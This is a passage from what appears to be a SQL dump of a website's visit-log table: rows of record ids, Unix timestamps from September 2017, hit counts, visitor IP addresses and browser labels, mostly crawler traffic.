1,0,0,'217.182.132.154','other'),(154693,1504993921,1,0,1,0,'66.249.76.93',''),(154694,1504994254,1,0,1,0,'66.249.76.108',''),(154695,1504994801,1,1,0,0,'217.182.132.146','other'),(154696,1504994864,2,2,0,0,'141.8.183.1','other'),(154697,1504995150,1,0,1,0,'66.249.76.89',''),(154698,1504995448,1,1,0,0,'217.182.132.184','other'),(154699,1504995729,1,1,0,0,'46.33.112.69','chrome'),(154700,1504995848,1,1,0,0,'51.255.71.117','other'),(154701,1504996020,1,1,0,0,'164.132.162.160','other'),(154702,1504996224,1,1,0,0,'217.182.132.192','other'),(154703,1504997033,1,0,1,0,'66.249.66.155',''),(154704,1504997279,1,1,0,0,'217.182.132.171','other'),(154705,1504997302,3,3,0,0,'141.8.183.1','other'),(154706,1504997689,1,1,0,0,'164.132.162.164','other'),(154707,1504998541,1,1,0,0,'217.182.132.191','other'),(154708,1504999385,1,1,0,0,'217.69.133.5','other'),(154709,1504999691,1,0,1,0,'66.249.66.157',''),(154710,1504999775,1,1,0,0,'164.132.162.153','other'),(154711,1504999898,1,1,0,0,'40.77.167.101','other'),(154712,1504999948,1,1,0,0,'51.255.71.128','other'),(154713,1505000155,1,1,0,0,'91.209.11.236','other'),(154714,1505000434,1,1,0,0,'87.116.183.190','firefox'),(154715,1505000464,1,1,0,0,'66.249.76.93','chrome'),(154716,1505000474,1,1,0,0,'66.249.76.109','chrome'),(154717,1505000699,1,1,0,0,'141.8.183.19','other'),(154718,1505000725,1,1,0,0,'137.74.201.100','other'),(154719,1505000733,1,1,0,0,'51.255.65.29','other'),(154720,1505001002,1,1,0,0,'141.8.183.1','other'),(154721,1505001192,1,1,0,0,'8.29.198.26','other'),(154722,1505001667,1,1,0,0,'217.69.133.225','other'),(154723,1505002399,2,2,0,0,'91.209.11.236','other'),(154724,1505002605,1,1,0,0,'51.255.65.49','other'),(154725,1505002625,1,1,0,0,'217.182.132.29','other'),(154726,1505002734,1,0,1,0,'66.249.76.91',''),(154727,1505004060,1,1,0,0,'217.182.132.150','other'),(154728,1505004160,1,1,0,0,'51.255.71.130','other'),(154729,1505004843,1,1,0,0,'217.182.132.59','other'),(154730,1505004990,1,0,1,0,'66.249.76.89',''),(154731,1505005006,1,1,0,0,'141.8.142.83','other'),(154732,1505005079,1,1,0,0,'51.255.65.64','other'),(154733,1505005590,1,1,0,0,'217.182.132.241','other'),(154734,1505005689,1,1,0,0,'66.249.66.74','chrome'),(154735,1505006048,1,0,1,0,'66.249.66.156',''),(154736,1505006126,1,1,0,0,'164.132.162.157','other'),(154737,1505006186,1,1,0,0,'178.154.171.53','other'),(154738,1505006227,1,1,0,0,'217.182.132.16','other'),(154739,1505006348,1,1,0,0,'5.45.207.40','other'),(154740,1505006798,1,1,0,0,'51.255.65.20','other'),(154741,1505007247,1,1,0,0,'51.255.65.49','other'),(154742,1505007598,1,1,0,0,'51.255.71.133','other'),(154743,1505007696,1,1,0,0,'137.74.207.116','other'),(154744,1505007711,1,1,0,0,'66.249.76.109','chrome'),(154745,1505007888,1,1,0,0,'51.255.65.72','other'),(154746,1505008073,1,1,0,0,'51.255.71.127','other'),(154747,1505008077,2,2,0,0,'91.209.11.236','other'),(154748,1505008866,1,1,0,0,'40.77.167.101','other'),(154749,1505009533,1,1,0,0,'95.28.52.127','firefox'),(154750,1505009539,1,1,0,0,'77.37.220.219','firefox'),(154751,1505009626,1,1,0,0,'91.209.11.236','other'),(154752,1505010024,1,1,0,0,'51.255.65.61','other'),(154753,1505010151,1,1,0,0,'141.8.183.1','other'),(154754,1505010312,1,1,0,0,'5.255.253.33','other'),(154755,1505010315,1,1,0,0,'141.8.142.43','other'),(154756,1505010776,1,1,0,0,'217.182.132.16','other'),(154757,1505010853,1,1,0,0,'217.182.132.78','other'),(154758,1505011157,1,1,0,0,'51.255.71.119','other'),(154759,1505011424,1,1,0,0,'91.209.11.236','other'),(154760,1505011823,1,1,0,0,'66.249.76.89','chrome'),(154761,1505011917,1,1,0,0,'217.182.132.154','other'),(154762,1505012020,1,1,0,0,'8.29.198.26','other'),(154763,1505012429,2,2,0,0,'91.209.11.236','other'),(154764,1505012593,1,1,0,0,'51.255.65.67','other'),(154765,1505012610,1,1,0,0,'54.165.59.7','other'),(154766,1505013018,1,1,0,0,'5.45.207.64','other'),(154767,1505013758,1,1,0,0,'51.255.71.128','other'),(154768,1505013788,1,1,0,0,'54.165.59.7','other'),(154769,1505013807,1,1,0,0,'51.255.65.59','other'),(154770,1505014289,1,1,0,0,'137.74.207.116','other'),(154771,1505014902,2,2,0,0,'141.8.183.1','other'),(154772,1505015014,2,2,0,0,'51.255.65.41','other'),(154773,1505015052,1,1,0,0,'51.255.65.82','other'),(154774,1505015683,2,0,2,0,'66.249.66.156',''),(154775,1505015715,1,1,0,0,'51.255.65.34','other'),(154776,1505016055,2,2,0,0,'5.45.207.64','other'),(154777,1505016111,1,1,0,0,'217.182.132.86','other'),(154778,1505016402,1,1,0,0,'180.76.15.146','other'),(154779,1505016434,1,1,0,0,'217.182.132.29','other'),(154780,1505016632,1,1,0,0,'146.185.223.220','chrome'),(154781,1505016741,1,1,0,0,'164.132.162.187','other'),(154782,1505016765,1,0,1,0,'66.249.76.91',''),(154783,1505016888,1,1,0,0,'66.249.76.109','chrome'),(154784,1505017268,1,1,0,0,'91.196.178.70','chrome'),(154785,1505017366,1,1,0,0,'141.8.183.1','other'),(154786,1505017381,1,1,0,0,'51.255.65.68','other'),(154787,1505017604,1,1,0,0,'217.182.132.68','other'),(154788,1505018136,1,1,0,0,'217.182.132.16','other'),(154789,1505018179,1,1,0,0,'40.77.167.101','other'),(154790,1505018564,1,1,0,0,'178.68.124.106','chrome'),(154791,1505018922,1,1,0,0,'168.235.198.98','other'),(154792,1505019069,2,2,0,0,'5.45.207.64','other'),(154793,1505019307,2,2,0,0,'141.8.183.1','other'),(154794,1505019313,1,1,0,0,'217.182.132.32','other'),(154795,1505019396,1,1,0,0,'217.182.132.170','other'),(154796,1505019652,1,1,0,0,'217.182.132.50','other'),(154797,1505019847,1,1,0,0,'51.255.65.75','other'),(154798,1505019908,1,1,0,0,'66.249.66.76','chrome'),(154799,1505019935,1,1,0,0,'217.182.132.73','other'),(154800,1505020134,1,1,0,0,'217.182.132.150','other'),(154801,1505020610,1,1,0,0,'5.45.207.64','other'),(154802,1505020836,1,1,0,0,'217.182.132.52','other'),(154803,1505020963,1,1,0,0,'54.165.59.7','other'),(154804,1505021087,2,2,0,0,'91.196.178.165','chrome'),(154805,1505021405,1,1,0,0,'51.255.65.83','other'),(154806,1505021741,1,1,0,0,'141.8.183.1','other'),(154807,1505022509,1,1,0,0,'51.255.65.39','other'),(154808,1505022564,1,1,0,0,'217.182.132.72','other'),(154809,1505022602,1,1,0,0,'178.154.171.53','other'),(154810,1505022728,1,1,0,0,'178.154.171.3','other'),(154811,1505022842,1,1,0,0,'8.29.198.26','other'),(154812,1505022866,1,1,0,0,'91.196.178.130','chrome'),(154813,1505023130,19,19,0,0,'52.18.189.237','other'),(154814,1505023167,1,1,0,0,'51.255.65.56','other'),(154815,1505023327,1,1,0,0,'217.182.132.24','other'),(154816,1505023940,1,1,0,0,'141.8.183.1','other'),(154817,1505023987,1,1,0,0,'207.46.13.182','other'),(154818,1505024305,1,1,0,0,'66.249.76.107','chrome'),(154819,1505024309,1,0,1,0,'66.249.76.89',''),(154820,1505024765,1,1,0,0,'51.255.65.2','other'),(154821,1505024950,1,1,0,0,'180.76.15.32','other'),(154822,1505025146,2,2,0,0,'178.154.171.3','other'),(154823,1505025224,1,1,0,0,'213.180.203.14','other'),(154824,1505025437,1,1,0,0,'51.255.65.90','other'),(154825,1505025513,1,1,0,0,'217.182.132.27','other'),(154826,1505025651,1,1,0,0,'91.196.178.134','firefox'),(154827,1505025674,1,1,0,0,'5.45.207.83','other'),(154828,1505025813,1,1,0,0,'51.255.65.27','other'),(154829,1505026310,1,1,0,0,'51.255.65.69','other'),(154830,1505026596,2,2,0,0,'5.45.207.64','other'),(154831,1505027519,1,1,0,0,'141.8.183.21','other'),(154832,1505027537,12,12,0,0,'192.99.203.35','other'),(154833,1505027552,1,1,0,0,'5.45.207.64','other'),(154834,1505027556,1,1,0,0,'95.108.181.58','other'),(154835,1505027676,19,19,0,0,'34.253.118.67','other'),(154836,1505027784,1,1,0,0,'91.196.178.161','chrome'),(154837,1505028099,1,1,0,0,'137.74.207.159','other'),(154838,1505028354,1,1,0,0,'5.255.253.4','other'),(154839,1505028498,1,1,0,0,'5.255.253.33','other'),(154840,1505028547,1,1,0,0,'5.45.207.83','other'),(154841,1505028809,1,1,0,0,'5.255.253.14','other'),(154842,1505029264,19,19,0,0,'34.240.120.106','other'),(154843,1505029504,1,1,0,0,'51.255.65.5','other'),(154844,1505029764,1,1,0,0,'51.255.65.88','other'),(154845,1505029904,1,1,0,0,'5.255.253.4','other'),(154846,1505030068,1,1,0,0,'141.8.132.37','other'),(154847,1505030673,1,1,0,0,'217.182.132.56','other'),(154848,1505030698,1,1,0,0,'66.249.76.93','chrome'),(154849,1505031421,1,1,0,0,'178.154.200.36','other'),(154850,1505031583,1,1,0,0,'217.182.132.190','other'),(154851,1505032015,19,19,0,0,'52.18.55.181','other'),(154852,1505032461,1,1,0,0,'141.8.132.37','other'),(154853,1505033143,1,1,0,0,'5.255.253.4','other'),(154854,1505033146,1,1,0,0,'37.9.113.94','other'),(154855,1505033389,1,1,0,0,'137.74.201.99','other'),(154856,1505033627,1,1,0,0,'217.182.132.152','other'),(154857,1505033662,1,1,0,0,'8.29.198.25','other'),(154858,1505034049,1,1,0,0,'141.8.132.37','other'),(154859,1505034753,1,1,0,0,'52.18.130.221','other'),(154860,1505034803,1,1,0,0,'207.46.13.182','other'),(154861,1505035241,19,19,0,0,'5.189.153.139','other'),(154862,1505035392,1,1,0,0,'51.255.65.68','other'),(154863,1505035737,1,1,0,0,'40.77.167.101','other'),(154864,1505036460,1,1,0,0,'95.108.181.78','other'),(154865,1505036578,1,1,0,0,'217.182.132.155','other'),(154866,1505036746,1,1,0,0,'46.201.174.65','firefox'),(154867,1505036833,1,1,0,0,'217.69.133.220','other'),(154868,1505036962,1,1,0,0,'51.255.65.27','other'),(154869,1505037277,1,1,0,0,'107.167.106.235','opera'),(154870,1505037372,1,1,0,0,'5.255.253.14','other'),(154871,1505037448,8,8,0,0,'46.4.32.75','other'),(154872,1505037464,1,1,0,0,'5.255.253.19','other'),(154873,1505037522,1,1,0,0,'141.8.183.19','other'),(154874,1505037625,1,1,0,0,'91.196.178.136','chrome'),(154875,1505037790,1,1,0,0,'95.108.181.58','other'),(154876,1505037963,1,1,0,0,'217.182.132.82','other'),(154877,1505038187,1,1,0,0,'46.39.36.11','chrome'),(154878,1505038214,1,1,0,0,'40.77.167.101','other'),(154879,1505038442,1,1,0,0,'141.8.142.56','other'),(154880,1505038656,1,1,0,0,'207.46.13.182','other'),(154881,1505038780,1,1,0,0,'217.182.132.19','other'),(154882,1505038819,1,1,0,0,'92.112.248.198','chrome'),(154883,1505038827,1,1,0,0,'217.182.132.56','other'),(154884,1505038904,19,19,0,0,'34.250.99.222','other'),(154885,1505038986,18,18,0,0,'52.18.130.221','other'),(154886,1505039124,2,2,0,0,'31.43.249.194','chrome'),(154887,1505039628,1,1,0,0,'217.69.133.218','other'),(154888,1505039843,1,1,0,0,'141.8.142.21','other'),(154889,1505039996,1,1,0,0,'46.201.174.65','firefox'),(154890,1505040362,2,2,0,0,'5.45.207.64','other'),(154891,1505040479,1,1,0,0,'217.182.132.55','other'),(154892,1505040642,1,1,0,0,'199.58.86.209','other'),(154893,1505040989,1,1,0,0,'51.255.65.25','other'),(154894,1505041042,1,0,1,0,'66.249.76.109',''),(154895,1505041150,2,2,0,0,'54.165.59.7','other'),(154896,1505041565,1,1,0,0,'217.182.132.77','other'),(154897,1505041756,1,1,0,0,'51.255.65.6','other'),(154898,1505041842,1,1,0,0,'66.249.66.155','chrome'),(154899,1505041931,1,1,0,0,'217.182.132.55','other'),(154900,1505041975,1,1,0,0,'107.167.104.121','opera'),(154901,1505042326,1,1,0,0,'34.240.26.189','other'),(154902,1505042834,1,1,0,0,'217.182.132.32','other'),(154903,1505042932,3,3,0,0,'85.109.243.231','other'),(154904,1505042971,1,1,0,0,'91.196.178.135','chrome'),(154905,1505042988,19,19,0,0,'52.50.32.179','other'),(154906,1505043159,1,1,0,0,'217.69.133.5','other'),(154907,1505043221,1,1,0,0,'51.255.65.62','other'),(154908,1505043331,3,3,0,0,'5.45.207.64','other'),(154909,1505043528,1,1,0,0,'217.69.133.216','other'),(154910,1505043627,1,1,0,0,'141.8.142.21','other'),(154911,1505044173,1,1,0,0,'178.92.75.4','chrome'),(154912,1505044291,1,1,0,0,'51.255.65.2','other'),(154913,1505044359,1,1,0,0,'141.8.183.1','other'),(154914,1505044487,1,1,0,0,'8.29.198.26','other'),(154915,1505044853,1,1,0,0,'46.203.217.223','chrome'),(154916,1505045036,1,0,1,0,'66.249.76.107',''),(154917,1505045190,1,1,0,0,'157.55.39.185','other'),(154918,1505045281,1,1,0,0,'51.255.65.26','other'),(154919,1505045415,1,1,0,0,'141.8.142.56','other'),(154920,1505045418,1,1,0,0,'213.180.203.32','other'),(154921,1505045518,1,1,0,0,'217.182.132.147','other'),(154922,1505045850,1,1,0,0,'37.115.124.229','chrome'),(154923,1505045968,1,1,0,0,'217.69.133.4','other'),(154924,1505046196,1,1,0,0,'37.9.113.180','other'),(154925,1505046441,1,1,0,0,'5.255.253.2','other'),(154926,1505046485,2,2,0,0,'107.167.105.244','opera'),(154927,1505046913,1,1,0,0,'217.182.132.183','other'),(154928,1505046941,2,2,0,0,'91.209.11.236','other'),(154929,1505046968,1,1,0,0,'217.182.132.63','other'),(154930,1505046993,1,1,0,0,'178.151.138.109','chrome'),(154931,1505047361,1,1,0,0,'217.69.133.218','other'),(154932,1505047554,1,1,0,0,'5.45.207.26','other'),(154933,1505047856,1,1,0,0,'217.182.132.175','other'),(154934,1505047916,1,1,0,0,'95.108.181.63','other'),(154935,1505048136,1,1,0,0,'37.9.113.163','other'),(154936,1505048427,2,2,0,0,'91.209.11.236','other'),(154937,1505048478,1,1,0,0,'91.196.178.101','other'),(154938,1505048539,1,1,0,0,'31.43.250.132','chrome'),(154939,1505048653,1,1,0,0,'178.154.200.27','other'),(154940,1505048777,1,1,0,0,'51.255.65.41','other'),(154941,1505049420,2,2,0,0,'91.209.11.236','other'),(154942,1505049468,1,1,0,0,'51.255.65.57','other'),(154943,1505050049,1,1,0,0,'157.55.39.185','other'),(154944,1505050126,1,1,0,0,'51.255.65.60','other'),(154945,1505050622,1,1,0,0,'217.69.133.218','other'),(154946,1505050979,5,5,0,0,'192.99.203.35','other'),(154947,1505051053,1,1,0,0,'51.255.65.42','other'),(154948,1505051722,1,1,0,0,'91.209.11.236','other'),(154949,1505051966,1,1,0,0,'37.73.237.131','chrome'),(154950,1505052329,1,1,0,0,'141.8.142.45','other'),(154951,1505053041,1,1,0,0,'51.255.65.85','other'),(154952,1505053106,1,0,1,0,'66.249.76.109',''),(154953,1505053477,1,1,0,0,'157.55.39.185','other'),(154954,1505053527,1,1,0,0,'37.73.237.131','chrome'),(154955,1505053973,1,1,0,0,'141.8.142.45','other'),(154956,1505054004,1,1,0,0,'216.244.66.237','other'),(154957,1505054494,1,1,0,0,'217.69.133.216','other'),(154958,1505054752,1,1,0,0,'164.132.162.155','other'),(154959,1505054838,19,19,0,0,'54.229.158.5','other'),(154960,1505054977,1,1,0,0,'51.255.65.4','other'),(154961,1505055232,1,1,0,0,'164.132.162.153','other'),(154962,1505055309,1,1,0,0,'8.29.198.27','other'),(154963,1505055876,1,1,0,0,'5.45.207.64','other'),(154964,1505056654,1,1,0,0,'217.182.132.22','other'),(154965,1505056992,1,1,0,0,'91.209.11.236','other'),(154966,1505057281,1,1,0,0,'217.69.133.216','other'),(154967,1505057404,1,1,0,0,'107.167.105.9','other'),(154968,1505057522,1,1,0,0,'91.196.178.37','chrome'),(154969,1505057606,1,1,0,0,'217.182.132.77','other'),(154970,1505058088,1,1,0,0,'188.163.17.124','chrome'),(154971,1505058457,1,1,0,0,'107.167.104.106','opera'),(154972,1505058809,1,1,0,0,'51.255.65.47','other'),(154973,1505059103,1,1,0,0,'91.209.11.236','other'),(154974,1505059288,1,1,0,0,'157.55.39.185','other'),(154975,1505059734,1,1,0,0,'5.45.207.64','other'),(154976,1505060167,1,0,1,0,'66.249.76.93',''),(154977,1505060169,1,1,0,0,'51.255.65.16','other'),(154978,1505060912,1,1,0,0,'37.73.254.84','other'),(154979,1505061111,1,1,0,0,'217.69.133.221','other'),(154980,1505061398,1,1,0,0,'141.8.183.1','other'),(154981,1505061971,1,1,0,0,'52.19.166.237','other'),(154982,1505062462,1,1,0,0,'5.45.207.42','other'),(154983,1505062509,1,1,0,0,'51.255.65.6','other'),(154984,1505062675,1,1,0,0,'217.182.132.31','other'),(154985,1505063097,1,0,1,0,'66.249.76.91',''),(154986,1505063126,1,1,0,0,'217.182.132.88','other'),(154987,1505063226,2,2,0,0,'5.45.207.64','other'),(154988,1505063231,1,1,0,0,'157.55.39.185','other'),(154989,1505063341,1,0,1,0,'66.249.76.89',''),(154990,1505063377,2,0,2,0,'66.249.66.75',''),(154991,1505063488,1,1,0,0,'164.132.162.157','other'),(154992,1505063736,2,2,0,0,'95.108.181.63','other'),(154993,1505063788,1,1,0,0,'52.51.14.173','other'),(154994,1505064645,1,1,0,0,'141.8.183.5','other'),(154995,1505065052,1,1,0,0,'5.45.207.64','other'),(154996,1505065218,1,1,0,0,'51.255.65.52','other'),(154997,1505065657,1,1,0,0,'51.255.65.49','other'),(154998,1505065884,1,1,0,0,'217.182.132.149','other'),(154999,1505066135,1,1,0,0,'8.29.198.27','other'),(155000,1505066238,1,0,1,0,'66.249.66.157',''),(155001,1505066310,1,1,0,0,'217.182.132.50','other'),(155002,1505066357,1,1,0,0,'40.77.167.48','other'),(155003,1505066381,1,1,0,0,'37.9.113.138','other'),(155004,1505066545,1,1,0,0,'141.8.183.1','other'),(155005,1505066874,1,1,0,0,'217.182.132.7','other'),(155006,1505067124,1,1,0,0,'91.196.178.40','chrome'),(155007,1505067174,1,1,0,0,'217.69.133.217','other'),(155008,1505067601,2,2,0,0,'5.45.207.64','other'),(155009,1505067613,1,1,0,0,'66.249.66.75','chrome'),(155010,1505067787,1,1,0,0,'217.69.133.219','other'),(155011,1505067987,1,1,0,0,'217.182.132.66','other'),(155012,1505068041,1,0,1,0,'66.249.76.107',''),(155013,1505068154,1,1,0,0,'141.8.142.21','other'),(155014,1505068390,1,1,0,0,'217.182.132.76','other'),(155015,1505068514,1,1,0,0,'91.196.178.135','chrome'),(155016,1505068703,1,1,0,0,'141.8.183.1','other'),(155017,1505068930,1,1,0,0,'91.196.178.71','chrome'),(155018,1505069436,1,1,0,0,'46.211.152.212','chrome'),(155019,1505069856,1,1,0,0,'51.255.65.97','other'),(155020,1505069866,1,1,0,0,'217.69.133.215','other'),(155021,1505070030,1,1,0,0,'107.167.104.106','opera'),(155022,1505070222,1,1,0,0,'51.255.65.11','other'),(155023,1505070442,1,1,0,0,'51.255.65.42','other'),(155024,1505070980,1,1,0,0,'137.74.207.109','other'),(155025,1505071417,1,1,0,0,'217.182.132.54','other'),(155026,1505071586,1,1,0,0,'180.76.15.19','other'),(155027,1505071854,1,1,0,0,'51.255.65.58','other'),(155028,1505072419,2,2,0,0,'54.165.59.7','other'),(155029,1505072519,1,1,0,0,'217.182.132.184','other'),(155030,1505072568,1,1,0,0,'217.69.133.4','other'),(155031,1505072580,1,1,0,0,'217.69.133.6','other'),(155032,1505072630,1,1,0,0,'216.244.66.237','other'),(155033,1505072966,1,1,0,0,'217.182.132.5','other'),(155034,1505073225,1,1,0,0,'95.132.26.182','chrome'),(155035,1505073551,1,1,0,0,'141.8.183.1','other'),(155036,1505073635,1,1,0,0,'217.69.133.67','other'),(155037,1505073653,1,1,0,0,'157.55.39.65','other'),(155038,1505073687,1,1,0,0,'157.55.39.250','other'),(155039,1505073916,1,1,0,0,'46.133.36.36','chrome'),(155040,1505075161,1,1,0,0,'66.249.76.109','chrome'),(155041,1505075239,1,1,0,0,'66.249.76.93','chrome'),(155042,1505075340,1,1,0,0,'51.255.65.27','other'),(155043,1505075400,1,1,0,0,'51.255.65.22','other'),(155044,1505075690,1,1,0,0,'34.250.159.192','other'),(155045,1505075951,1,1,0,0,'217.69.133.216','other'),(155046,1505076032,5,5,0,0,'46.229.168.73','other'),(155047,1505076051,3,3,0,0,'46.229.168.69','other'),(155048,1505076068,5,5,0,0,'46.229.168.79','other'),(155049,1505076087,9,9,0,0,'46.229.168.72','other'),(155050,1505076129,3,3,0,0,'46.229.168.68','other'),(155051,1505076147,2,2,0,0,'46.229.168.71','other'),(155052,1505076183,4,4,0,0,'46.229.168.70','other'),(155053,1505076211,2,2,0,0,'46.229.168.77','other'),(155054,1505076219,3,3,0,0,'46.229.168.65','other'),(155055,1505076318,5,5,0,0,'46.229.168.80','other'),(155056,1505076327,4,4,0,0,'46.229.168.67','other'),(155057,1505076454,3,3,0,0,'46.229.168.74','other'),(155058,1505076478,4,4,0,0,'46.229.168.78','other'),(155059,1505076508,5,5,0,0,'46.229.168.76','other'),(155060,1505076522,1,0,1,0,'66.249.76.91',''),(155061,1505076605,7,7,0,0,'46.229.168.66','other'),(155062,1505076707,1,1,0,0,'51.255.65.47','other'),(155063,1505076832,1,1,0,0,'46.229.168.75','other'),(155064,1505076894,1,1,0,0,'51.255.65.53','other'),(155065,1505076941,2,2,0,0,'46.229.168.73','other'),(155066,1505076958,1,1,0,0,'46.229.168.69','other'),(155067,1505076962,1,1,0,0,'8.29.198.25','other'),(155068,1505077000,3,3,0,0,'46.229.168.72','other'),(155069,1505077103,3,3,0,0,'46.229.168.71','other'),(155070,1505077139,1,1,0,0,'46.229.168.70','other'),(155071,1505077312,1,1,0,0,'46.229.168.65','other'),(155072,1505077359,1,1,0,0,'180.76.15.9','other'),(155073,1505078032,1,1,0,0,'217.182.132.54','other'),(155074,1505078494,1,1,0,0,'217.69.133.3','other'),(155075,1505078600,1,1,0,0,'217.69.133.217','other'),(155076,1505078810,1,1,0,0,'52.30.61.205','other'),(155077,1505079113,1,1,0,0,'51.255.71.121','other'),(155078,1505079627,1,1,0,0,'51.255.65.76','other'),(155079,1505079741,1,1,0,0,'5.45.207.64','other'),(155080,1505080690,1,1,0,0,'217.182.132.64','other'),(155081,1505080953,1,1,0,0,'5.255.253.29','other'),(155082,1505081015,1,1,0,0,'137.74.207.164','other'),(155083,1505081297,1,1,0,0,'123.59.78.122','chrome'),(155084,1505081779,1,1,0,0,'217.69.133.219','other'),(155085,1505081951,1,1,0,0,'51.255.71.127','other'),(155086,1505081988,1,1,0,0,'51.255.65.91','other'),(155087,1505082264,1,1,0,0,'141.8.142.21','other'),(155088,1505082867,1,1,0,0,'217.69.133.3','other'),(155089,1505082972,1,1,0,0,'141.8.183.1','other'),(155090,1505083320,1,1,0,0,'217.182.132.181','other'),(155091,1505083326,1,1,0,0,'137.74.207.120','other'),(155092,1505083681,1,1,0,0,'137.74.207.170','other'),(155093,1505084159,1,1,0,0,'51.255.65.59','other'),(155094,1505084815,1,1,0,0,'51.255.65.8','other'),(155095,1505087505,1,1,0,0,'217.69.133.216','other'),(155096,1505087541,1,1,0,0,'141.8.183.1','other'),(155097,1505087565,1,1,0,0,'217.182.132.35','other'),(155098,1505087786,1,1,0,0,'8.29.198.27','other'),(155099,1505087912,1,1,0,0,'5.45.207.64','other'),(155100,1505087955,1,1,0,0,'51.255.65.51','other'),(155101,1505088474,1,1,0,0,'151.80.27.116','other'),(155102,1505089265,1,1,0,0,'217.182.132.59','other'),(155103,1505089478,1,1,0,0,'106.75.85.117','chrome'),(155104,1505089780,3,3,0,0,'5.45.207.64','other'),(155105,1505090145,1,1,0,0,'213.180.203.32','other'),(155106,1505090931,1,1,0,0,'217.69.133.84','other'),(155107,1505091025,1,1,0,0,'5.45.207.64','other'),(155108,1505091099,1,1,0,0,'141.8.142.21','other'),(155109,1505091405,1,1,0,0,'137.74.207.102','other'),(155110,1505091639,1,1,0,0,'51.255.65.89','other'),(155111,1505091800,1,1,0,0,'217.182.132.15','other'),(155112,1505093227,1,1,0,0,'217.182.132.95','other'),(155113,1505093249,1,1,0,0,'217.182.132.176','other'),(155114,1505093352,1,1,0,0,'51.255.65.39','other'),(155115,1505094006,1,1,0,0,'216.244.66.237','other'),(155116,1505094204,1,1,0,0,'107.167.106.100','opera'),(155117,1505094232,1,1,0,0,'51.255.65.17','other'),(155118,1505094656,1,1,0,0,'217.182.132.5','other'),(155119,1505094779,1,1,0,0,'51.255.65.85','other'),(155120,1505094883,1,1,0,0,'51.255.65.72','other'),(155121,1505095059,1,1,0,0,'217.69.133.217','other'),(155122,1505095064,1,1,0,0,'217.69.133.85','other'),(155123,1505095102,1,1,0,0,'51.255.65.97','other'),(155124,1505095145,1,0,1,0,'66.249.66.76',''),(155125,1505095335,1,0,1,0,'66.249.66.75',''),(155126,1505095472,1,1,0,0,'141.8.142.21','other'),(155127,1505095515,1,1,0,0,'217.69.133.194','other'),(155128,1505095571,1,1,0,0,'141.8.183.1','other'),(155129,1505096804,1,1,0,0,'51.255.71.133','other'),(155130,1505096890,1,1,0,0,'66.249.66.155','chrome'),(155131,1505096920,1,1,0,0,'51.255.65.15','other'),(155132,1505096971,1,1,0,0,'51.255.65.68','other'),(155133,1505097192,2,2,0,0,'141.8.142.21','other'),(155134,1505097595,1,1,0,0,'5.45.207.64','other'),(155135,1505098189,1,1,0,0,'217.182.132.84','other'),(155136,1505098273,1,1,0,0,'51.255.65.50','other'),(155137,1505098453,1,1,0,0,'51.255.71.127','other'),(155138,1505098565,1,1,0,0,'5.45.207.64','other'),(155139,1505098608,1,1,0,0,'8.29.198.26','other'),(155140,1505098637,1,1,0,0,'51.255.65.95','other'),(155141,1505098783,1,1,0,0,'217.69.133.85','other'),(155142,1505099443,1,1,0,0,'51.255.65.7','other'),(155143,1505099623,1,1,0,0,'51.255.65.77','other'),(155144,1505099744,1,1,0,0,'51.255.65.41','other'),(155145,1505100051,1,1,0,0,'217.69.133.194','other'),(155146,1505100183,1,1,0,0,'52.214.197.123','other'),(155147,1505100776,1,1,0,0,'217.182.132.78','other'),(155148,1505100973,1,1,0,0,'178.154.200.27','other'),(155149,1505100977,1,1,0,0,'5.45.207.64','other'),(155150,1505101153,1,1,0,0,'51.255.71.112','other'),(155151,1505101167,1,1,0,0,'213.180.203.32','other'),(155152,1505101606,1,1,0,0,'217.69.133.85','other'),(155153,1505101609,1,1,0,0,'51.255.65.6','other'),(155154,1505101883,2,2,0,0,'141.8.183.1','other'),(155155,1505101919,1,1,0,0,'217.182.132.179','other'),(155156,1505102668,1,1,0,0,'5.45.207.32','other'),(155157,1505103032,1,1,0,0,'141.8.142.21','other'),(155158,1505103080,2,2,0,0,'141.8.183.1','other'),(155159,1505103240,1,1,0,0,'51.255.71.120','other'),(155160,1505103433,1,1,0,0,'51.255.65.57','other'),(155161,1505103460,1,1,0,0,'51.255.71.115','other'),(155162,1505103586,1,1,0,0,'5.255.253.2','other'),(155163,1505103589,2,2,0,0,'5.45.207.42','other'),(155164,1505103615,1,1,0,0,'137.74.207.164','other'),(155165,1505103745,1,1,0,0,'151.80.27.116','other'),(155166,1505103962,1,1,0,0,'5.45.207.64','other'),(155167,1505103996,1,1,0,0,'217.182.132.151','other'),(155168,1505104425,1,1,0,0,'217.182.132.23','other'),(155169,1505104438,1,1,0,0,'141.8.142.21','other'),(155170,1505104677,1,1,0,0,'157.55.39.185','other'),(155171,1505104981,1,1,0,0,'217.182.132.30','other'),(155172,1505105059,1,1,0,0,'157.55.39.208','other'),(155173,1505105368,1,0,1,0,'66.249.66.75',''),(155174,1505105542,1,1,0,0,'217.182.132.17','other'),(155175,1505105597,2,2,0,0,'5.45.207.64','other'),(155176,1505105641,1,1,0,0,'51.255.65.49','other'),(155177,1505105747,1,1,0,0,'217.69.133.4','other'),(155178,1505105897,1,1,0,0,'107.167.105.232','opera'),(155179,1505106460,1,1,0,0,'178.154.200.7','other'),(155180,1505106538,1,1,0,0,'91.196.178.70','firefox'),(155181,1505106646,1,1,0,0,'5.255.253.4','other'),(155182,1505106650,2,2,0,0,'141.8.142.21','other'),(155183,1505106701,1,1,0,0,'51.255.65.80','other'),(155184,1505107117,1,1,0,0,'5.45.207.32','other'),(155185,1505107136,1,1,0,0,'128.68.57.72','msie'),(155186,1505107705,1,1,0,0,'107.167.105.232','opera'),(155187,1505107997,2,2,0,0,'95.213.141.126','opera'),(155188,1505108140,1,1,0,0,'217.182.132.154','other'),(155189,1505108381,1,1,0,0,'141.8.183.1','other'),(155190,1505108455,1,1,0,0,'164.132.162.156','other'),(155191,1505108570,1,1,0,0,'5.45.207.64','other'),(155192,1505108631,1,1,0,0,'217.182.132.186','other'),(155193,1505108912,1,1,0,0,'91.196.178.164','chrome'),(155194,1505109442,1,1,0,0,'8.29.198.25','other'),(155195,1505109556,1,1,0,0,'107.167.105.232','opera'),(155196,1505110082,1,1,0,0,'91.196.177.95','chrome'),(155197,1505110196,2,2,0,0,'91.196.178.70','chrome'),(155198,1505110541,1,1,0,0,'95.132.99.67','chrome'),(155199,1505110803,1,1,0,0,'141.8.183.1','other'),(155200,1505110966,3,0,3,0,'66.249.66.75',''),(155201,1505111121,1,1,0,0,'95.132.16.170','chrome'),(155202,1505111157,2,2,0,0,'5.45.207.64','other'),(155203,1505111203,1,1,0,0,'66.249.76.107','chrome'),(155204,1505111276,1,1,0,0,'81.1.242.33','other'),(155205,1505111316,1,1,0,0,'91.196.122.186','firefox'),(155206,15